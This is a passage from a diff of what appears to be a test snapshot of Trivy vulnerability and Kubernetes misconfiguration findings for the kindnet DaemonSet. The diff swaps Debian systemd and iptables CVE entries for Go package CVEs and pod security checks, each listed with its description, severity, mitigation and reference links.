"https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8400", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-33", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5538-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5200", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libudev1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", - ], - }, - "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.3.7", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.4", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", + ], + }, + "category": "Vulnerability", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.4", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "MEDIUM", @@ -95336,52 +96161,28 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", ], }, - "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kindnet-cni' of DaemonSet 'kindnet' should add 'ALL' to 'securityContext.capabilities.drop')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", - }, - { - "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, ], "severity": "LOW", @@ -95389,97 +96190,231 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", ], }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(DaemonSet 'kindnet' should not set 'spec.template.spec.hostNetwork' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv022", + ], + }, + "category": "Misconfiguration", + "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", + "name": "Non-default capabilities added(Container 'kindnet-cni' of DaemonSet 'kindnet' should not set 'securityContext.capabilities.add')", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://avd.aquasec.com/misconfig/ksv022", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(DaemonSet 'kindnet' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", @@ -95487,586 +96422,621 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libxtables12", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", ], }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", - }, - { - "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ConfigMap/extension-apiserver-authentication' / Class: 'config' / Type: 'kubernetes'", + "id": "AVD-KSV-0110", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://avd.aquasec.com/misconfig/avd-ksv-0110", + ], + }, + "category": "Misconfiguration", + "description": "Storing sensitive content such as usernames and email addresses in configMaps is unsafe", + "location": "scb://trivy/?Namespace=kube-system&Kind=ConfigMap&Name=extension-apiserver-authentication", + "mitigation": "Remove sensitive content from configMap data value", + "name": "ConfigMap with sensitive 